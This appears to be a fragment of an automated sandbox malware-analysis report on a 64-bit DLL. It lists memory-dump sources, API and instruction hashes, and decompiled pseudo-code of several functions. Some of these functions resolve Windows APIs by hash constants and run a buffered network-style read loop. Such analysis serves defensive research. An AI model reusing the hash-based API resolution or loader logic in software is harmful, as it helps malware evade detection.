                  • Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
                  • Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
                  • String ID:
                  • API String ID: 2518601019-0
                  • Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
                  • Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
                  • String ID:
                  • API String ID: 4260168601-0
                  • Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
                  • Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
                  • String ID: h
                  • API String ID: 1962595928-2439710439
                  • Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
                  • Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CloseHandle$ProcessTerminate
                  • String ID:
                  • API String ID: 1541851893-0
                  • Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
                  • Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800020DC(long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
                  				intOrPtr _t43;
                  				intOrPtr _t44;
                  				signed int _t45;
                  				long long* _t81;
                  				void* _t82;
                  				void* _t83;
                  				long long* _t84;
                  				void* _t104;
                  				long long _t108;
                  				void* _t111;
                  				void* _t112;
                  				void* _t121;
                  				int _t123;
                  				int _t126;
                  				void* _t129;
                  				CHAR* _t131;
                  
                  				_t81 = __rax;
                  				 *((long long*)(_t111 + 8)) = __rbx;
                  				 *((long long*)(_t111 + 0x18)) = _t108;
                  				 *((long long*)(_t111 + 0x20)) = __rsi;
                  				_t112 = _t111 - 0x1c0;
                  				_t109 =  *0x8000d4a0;
                  				r14d = 0;
                  				 *(_t112 + 0x1f8) = lstrlenA(_t131);
                  				memset(_t129, _t126, _t123);
                  				_t6 = _t104 + 1; // 0x1
                  				_t7 = _t129 + 2; // 0x2
                  				r11d = _t7;
                  				r8d = _t6;
                  				 *__rdx = r11w;
                  				HeapAlloc(_t104, ??);
                  				if (__rax == 0) goto 0x80002287;
                  				memcpy(??, ??, ??);
                  				_t43 =  *((intOrPtr*)(__rax));
                  				if (_t43 == dil) goto 0x80002192;
                  				if (_t43 == 0x3a) goto 0x8000218d;
                  				_t44 =  *((intOrPtr*)(__rax + 1));
                  				if (_t44 != dil) goto 0x8000217d;
                  				if (_t44 != dil) goto 0x80002195;
                  				_t121 = _t104;
                  				if (_t121 == _t104) goto 0x800021d9;
                  				_t8 = _t121 + 1; // 0x1
                  				 *_t121 = dil;
                  				if (_t8 == _t104) goto 0x800021d9;
                  				if (E000000011800038F8(_t8, __rcx, _t112 + 0x1f8) == 0) goto 0x80002279;
                  				_t45 =  *(_t112 + 0x1f8) & 0x0000ffff;
                  				asm("ror cx, 0x8");
                  				 *(__rdx + 2) = _t45;
                  				if (_t45 == 0) goto 0x80002279;
                  				E0000000118000459C(0x25fff021, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t81 == _t104) goto 0x800021f5;
                  				 *_t81();
                  				goto 0x800021f8;
                  				_t82 = _t104;
                  				if (_t82 != _t104) goto 0x8000224d;
                  				E0000000118000459C(0xb27f4910, _t82,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t82 == _t104) goto 0x8000221e;
                  				 *_t82();
                  				goto 0x80002220;
                  				if (0 != 0) goto 0x80002249;
                  				r14d = 1;
                  				E0000000118000459C(0x25fff021, _t82,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t82 == _t104) goto 0x80002241;
                  				 *_t82();
                  				goto 0x80002244;
                  				_t83 = _t104;
                  				if (_t83 != _t104) goto 0x8000224d;
                  				goto 0x8000225f;
                  				_t84 =  *((intOrPtr*)(_t83 + 0x18));
                  				 *((intOrPtr*)(__rdx + 4)) =  *((intOrPtr*)( *_t84));
                  				if (r14d == 0) goto 0x80002279;
                  				E0000000118000459C(0x9cb92d3f, _t84,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t84 == _t104) goto 0x80002279;
                  				 *_t84();
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}



















                  0x1800020dc
                  0x1800020dc
                  0x1800020e1
                  0x1800020e6
                  0x1800020f4
                  0x1800020fb
                  0x180002112
                  0x180002122
                  0x180002136
                  0x18000213b
                  0x18000213e
                  0x18000213e
                  0x180002142
                  0x18000214a
                  0x180002151
                  0x18000215d
                  0x18000216c
                  0x180002171
                  0x18000217b
                  0x180002180
                  0x180002185
                  0x18000218b
                  0x180002190
                  0x180002192
                  0x180002198
                  0x18000219a
                  0x18000219e
                  0x1800021a4
                  0x1800021b9
                  0x1800021bf
                  0x1800021c7
                  0x1800021cb
                  0x1800021d3
                  0x1800021e4
                  0x1800021ec
                  0x1800021f1
                  0x1800021f3
                  0x1800021f5
                  0x1800021fb
                  0x180002206
                  0x18000220e
                  0x18000221a
                  0x18000221c
                  0x180002222
                  0x18000222a
                  0x180002230
                  0x180002238
                  0x18000223d
                  0x18000223f
                  0x180002241
                  0x180002247
                  0x18000224b
                  0x18000224d
                  0x18000225b
                  0x180002262
                  0x18000226d
                  0x180002275
                  0x180002277
                  0x180002281
                  0x1800022a9

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlenmemcpymemset
                  • String ID: lJu
                  • API String ID: 1735321128-4100297759
                  • Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
                  • Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00000001180005DF8(long long __rbx, intOrPtr* __rcx, void* __r8) {
                  				signed long long _t88;
                  				long _t111;
                  				void* _t114;
                  				long _t117;
                  				void* _t121;
                  				void* _t122;
                  				long _t130;
                  				void* _t133;
                  
                  				 *((long long*)(_t121 + 0x18)) = __rbx;
                  				_t122 = _t121 - 0x30;
                  				_t88 =  *0x8000d4a0;
                  				r13d = 0;
                  				 *(__rcx + 0x5c) = r13d;
                  				 *(_t122 + 0x68) = r13d;
                  				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
                  				 *(_t122 + 0x60) = 4;
                  				E0000000118000459C(0x5431d47a, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e56;
                  				 *_t88();
                  				goto 0x80005e59;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e9d;
                  				_t10 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t10;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005ea0;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				 *(_t122 + 0x68) = r13d;
                  				 *(_t122 + 0x60) = r13d;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005eea;
                  				_t19 = _t122 + 0x68; // 0xa
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t19;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t133, _t130, _t111);
                  				if (_t88 == _t133) goto 0x80005fad;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005f43;
                  				_t27 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t27;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005f46;
                  				if (r13d == r13d) goto 0x80005f95;
                  				 *(_t122 + 0x60) =  *(_t122 + 0x60) >> 1;
                  				 *((intOrPtr*)(_t88 + _t88 * 2)) = r13w;
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t114, _t117);
                  				if (_t88 == _t133) goto 0x80005f8e;
                  				r8d =  *(_t122 + 0x60);
                  				r8d = r8d + 1;
                  				wcstombs(??, ??, ??);
                  				 *(__rcx + 0x20) = _t88;
                  				goto 0x80005f9d;
                  				goto 0x80005f9d;
                  				GetLastError();
                  				HeapFree(??, ??, ??);
                  				goto 0x80005fbc;
                  				goto 0x80005fbc;
                  				return GetLastError();
                  			}











                  0x180005df8
                  0x180005e04
                  0x180005e08
                  0x180005e19
                  0x180005e1f
                  0x180005e23
                  0x180005e2b
                  0x180005e31
                  0x180005e42
                  0x180005e4a
                  0x180005e52
                  0x180005e54
                  0x180005e5c
                  0x180005e6b
                  0x180005e73
                  0x180005e75
                  0x180005e7e
                  0x180005e81
                  0x180005e90
                  0x180005e99
                  0x180005e9b
                  0x180005ea3
                  0x180005ea9
                  0x180005eae
                  0x180005ebc
                  0x180005ec4
                  0x180005ec6
                  0x180005ecb
                  0x180005ece
                  0x180005ed1
                  0x180005edf
                  0x180005ee8
                  0x180005eea
                  0x180005ef8
                  0x180005f04
                  0x180005f13
                  0x180005f1b
                  0x180005f1d
                  0x180005f22
                  0x180005f28
                  0x180005f36
                  0x180005f3f
                  0x180005f41
                  0x180005f49
                  0x180005f56
                  0x180005f5a
                  0x180005f5f
                  0x180005f67
                  0x180005f73
                  0x180005f75
                  0x180005f80
                  0x180005f83
                  0x180005f88
                  0x180005f8c
                  0x180005f93
                  0x180005f95
                  0x180005fa5
                  0x180005fab
                  0x180005fb2
                  0x180005fce

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Alloc$ErrorFreeLastwcstombs
                  • String ID:
                  • API String ID: 4133724704-0
                  • Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
                  • Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 18%
                  			E00000001180003FCC(intOrPtr* __rcx) {
                  				void* __rbx;
                  				void* __rbp;
                  				long long* _t84;
                  				long long* _t85;
                  				void* _t87;
                  				intOrPtr* _t106;
                  				void* _t109;
                  
                  				_t84 =  *0x8000d4a0;
                  				_t106 = __rcx;
                  				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0;
                  				E0000000118000459C(0x3a7e805d, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000400e;
                  				 *_t84();
                  				goto 0x80004010;
                  				if (0 == 0) goto 0x80004151;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x8000414c;
                  				 *0x8000d028();
                  				if (0 != 0) goto 0x80004145;
                  				r8d = 0x1000;
                  				HeapAlloc(??, ??, ??);
                  				if (_t84 == 0) goto 0x80004133;
                  				E0000000118000459C(0x3cd8e449, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000408d;
                  				r8d = 0x1000;
                  				r8d =  <  ?  *((void*)(_t109 + 0x50)) : r8d;
                  				 *_t84();
                  				goto 0x8000408f;
                  				if (0 == 0) goto 0x800040b7;
                  				r8d =  *(_t109 + 0x58);
                  				r9d = 0;
                  				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60))));
                  				 *((intOrPtr*)(_t85 + 0x20))();
                  				r11d =  *(_t109 + 0x58);
                  				 *((intOrPtr*)(_t109 + 0x50)) =  *((intOrPtr*)(_t109 + 0x50)) - r11d;
                  				if (0 == 0) goto 0x800040bf;
                  				goto 0x80004059;
                  				GetLastError();
                  				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
                  				E0000000118000459C(0x3a7e805d, _t85,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t85 == 0) goto 0x800040ef;
                  				 *_t85();
                  				goto 0x800040f1;
                  				if (0 == 0) goto 0x80004101;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x80004110;
                  				goto 0x80004059;
                  				GetLastError();
                  				goto 0x80004110;
                  				HeapFree(??, ??, ??);
                  				if (0x102 != 0) goto 0x80004138;
                  				E000000011800085E4(_t87, __rcx,  *((intOrPtr*)(_t109 + 0x60)));
                  				goto 0x80004138;
                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60)))) + 0x10))();
                  				goto 0x80004166;
                  				goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000008;
                  				goto 0x80004166;
                  				if (GetLastError() != 0x2efe) goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000000;
                  				return 0;
                  			}










                  0x180003fda
                  0x180003fe1
                  0x180003fef
                  0x180003ff7
                  0x180003fff
                  0x18000400a
                  0x18000400c
                  0x180004012
                  0x18000401c
                  0x18000402e
                  0x180004036
                  0x18000403e
                  0x180004047
                  0x180004053
                  0x180004062
                  0x18000406a
                  0x180004070
                  0x180004083
                  0x180004089
                  0x18000408b
                  0x180004091
                  0x180004098
                  0x18000409d
                  0x1800040a0
                  0x1800040a6
                  0x1800040a9
                  0x1800040ae
                  0x1800040b3
                  0x1800040b5
                  0x1800040b7
                  0x1800040cd
                  0x1800040d8
                  0x1800040e0
                  0x1800040eb
                  0x1800040ed
                  0x1800040f3
                  0x1800040fa
                  0x1800040fc
                  0x180004101
                  0x180004109
                  0x180004118
                  0x180004120
                  0x18000412a
                  0x180004131
                  0x180004140
                  0x180004143
                  0x18000414a
                  0x18000414c
                  0x18000414f
                  0x18000415e
                  0x180004160
                  0x180004172

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
                  • String ID:
                  • API String ID: 2540544816-0
                  • Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
                  • Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E000000011800091F8(void* __ecx, long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r9, signed long long* _a8, void* _a16, void* _a24) {
                  				void* _t46;
                  				long _t52;
                  				void* _t54;
                  				signed long long _t67;
                  				long long _t69;
                  				signed long long* _t73;
                  				signed long long _t80;
                  				signed long long _t87;
                  				intOrPtr _t90;
                  				struct _FILETIME* _t91;
                  				void* _t98;
                  				void* _t103;
                  				signed long long _t104;
                  				signed long long* _t105;
                  
                  				_t103 = _t98;
                  				 *((long long*)(_t103 + 0x10)) = __rbx;
                  				 *((long long*)(_t103 + 0x18)) = __rsi;
                  				 *(_t103 + 8) =  *(_t103 + 8) & 0x00000000;
                  				 *((long long*)(_t103 - 0x18)) = _t103 + 8;
                  				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
                  				_t73 = _a8;
                  				if (_t73 == 0) goto 0x8000925e;
                  				_t87 = _t73 + 0x18;
                  				 *(_t73 + 0x20) = _t87;
                  				_a8[3] = _t87;
                  				_a8[2] = __rcx;
                  				_a8[1] = __rdx;
                  				 *_a8 =  *_a8 | 0xffffffff;
                  				if (_t46 != 0) goto 0x80009327;
                  				GetSystemTimeAsFileTime(_t91);
                  				EnterCriticalSection(??);
                  				_t104 = __rcx + 0x88;
                  				_t80 =  *(_t104 + 8);
                  				_a8[3] = _t104;
                  				_a8[4] = _t80;
                  				 *_t80 =  &(_a8[3]);
                  				_t67 =  &(_a8[3]);
                  				 *(_t104 + 8) = _t67;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0x1");
                  				E00000001180006C8C(__ecx, _t67, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
                  				_a8[6] = _t67;
                  				if (_a8[6] != 0) goto 0x80009331;
                  				_t52 = GetLastError();
                  				EnterCriticalSection(??);
                  				_t105 = _a8;
                  				_t69 =  *((intOrPtr*)(_t105 + 0x20));
                  				_t90 =  *((intOrPtr*)(_t105 + 0x18));
                  				 *_t69 = _t90;
                  				 *((long long*)(_t90 + 8)) = _t69;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0xffffffff");
                  				if (_t52 == 0) goto 0x80009331;
                  				if (_a8 == 0) goto 0x80009331;
                  				E00000001180002770(_t54, _a8);
                  				return _t52;
                  			}

















                  0x1800091f8
                  0x1800091fb
                  0x1800091ff
                  0x180009208
                  0x180009214
                  0x18000921b
                  0x180009221
                  0x18000922b
                  0x18000922d
                  0x180009231
                  0x18000923a
                  0x180009243
                  0x18000924c
                  0x180009255
                  0x180009260
                  0x18000926a
                  0x180009274
                  0x18000927f
                  0x180009286
                  0x18000928a
                  0x180009293
                  0x1800092a0
                  0x1800092ac
                  0x1800092b0
                  0x1800092b4
                  0x1800092ba
                  0x1800092cf
                  0x1800092d9
                  0x1800092e7
                  0x1800092f3
                  0x1800092f5
                  0x1800092fb
                  0x180009300
                  0x180009304
                  0x18000930c
                  0x18000930f
                  0x180009313
                  0x180009319
                  0x180009320
                  0x18000932a
                  0x18000932c
                  0x180009342

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
                  • String ID:
                  • API String ID: 3478816279-0
                  • Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
                  • Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ByteCharErrorHeapLastMultiWide$AllocFree
                  • String ID:
                  • API String ID: 2267670476-0
                  • Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
                  • Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00000001180009B7C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                  				intOrPtr _v40;
                  				long long _v56;
                  				void* _t32;
                  				intOrPtr _t33;
                  				void* _t55;
                  				WCHAR* _t63;
                  				WCHAR* _t66;
                  				CHAR* _t69;
                  
                  				_t32 = _t55;
                  				 *((long long*)(_t32 + 8)) = __rbx;
                  				 *((long long*)(_t32 + 0x10)) = __rbp;
                  				 *((long long*)(_t32 + 0x18)) = __rsi;
                  				 *((long long*)(_t32 + 0x20)) = __rdi;
                  				_t33 =  *0x8000d4a0;
                  				lstrlenA(_t69);
                  				lstrlenW(_t66);
                  				lstrlenW(_t63);
                  				r8d = __rbx + _t33 + 0x12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t33 == 0) goto 0x80009c2e;
                  				_v56 = __r8;
                  				__imp__wnsprintfW();
                  				r9d = 0;
                  				r8d = 0;
                  				E00000001180006754(__rbx, __rcx, _t33, __r8, __rdx,  *0x8000d490 + 0x80011438);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009c32;
                  				return _v40;
                  			}











                  0x180009b7c
                  0x180009b7f
                  0x180009b83
                  0x180009b87
                  0x180009b8b
                  0x180009b99
                  0x180009bb6
                  0x180009bbf
                  0x180009bca
                  0x180009bd9
                  0x180009bdf
                  0x180009beb
                  0x180009c00
                  0x180009c05
                  0x180009c0b
                  0x180009c0e
                  0x180009c17
                  0x180009c26
                  0x180009c2c
                  0x180009c52

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
